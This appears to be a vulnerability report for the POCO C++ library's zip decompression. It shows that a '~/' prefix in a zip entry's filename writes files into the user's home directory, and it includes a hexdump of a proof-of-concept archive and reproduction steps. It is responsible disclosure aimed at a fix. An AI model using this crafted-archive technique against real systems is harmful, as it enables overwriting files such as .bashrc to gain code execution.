Description
By manipulation of the Zip input file header, the contents of the zip archive can be written to an arbitrary parent path of the user.
Expected behavior
Throw an exception if filename contains a parent directory reference. isValidPath() (ZipCommon.cpp) should check if the filename contains a tilde character.
Actual behavior
By inserting a tilde-slash (~/) in the filename area of the zip header, files can be written to the user's home directory.
Steps to reproduce the problem
Use the sample-unzip samle application as follows:
$ ./sample-unzip -f vuln.zip SOME_OUT_DIRvuln.zip contains a file foo. foo includes the string bar
vuln.zip hexdump:
00000000 50 4b 03 04 0a 00 00 00 00 00 bb 91 5f 4b e9 b3 |PK.........._K..|
00000010 a2 04 04 00 00 00 04 00 00 00 03 00 1c 00 7e 2f |..............~/|
00000020 6f 55 54 09 00 03 52 af f8 59 4d af f8 59 75 78 |oUT...R..YM..Yux|
00000030 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 62 61 72 |.............bar|
00000040 0a 50 4b 01 02 1e 03 0a 00 00 00 00 00 bb 91 5f |.PK............_|
00000050 4b e9 b3 a2 04 04 00 00 00 04 00 00 00 03 00 18 |K...............|
00000060 00 00 00 00 00 01 00 00 00 b4 81 00 00 00 00 66 |...............f|
00000070 6f 6f 55 54 05 00 03 52 af f8 59 75 78 0b 00 01 |ooUT...R..Yux...|
00000080 04 e8 03 00 00 04 e8 03 00 00 50 4b 05 06 00 00 |..........PK....|
00000090 00 00 01 00 01 00 49 00 00 00 41 00 00 00 00 00 |......I...A.....|
000000a0
After executing the program, a file o with the content bar is written in the home of the user.
~/o
(o is just an example name)
POCO version
Compiler and version
clang version 4.0.1 (tags/RELEASE_401/final)
Operating system and version
4.13.9-300.fc27.x86_64 #1 SMP Mon Oct 23 13:41:58 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
Security implications
Due to the current behavior of the Zip Decompress mechanism it is possible to write files in parent arbitrary user directories. For example, a manipulated .bashrc could be inserted into the user's home.
Cheers
-Stephan Zeisberg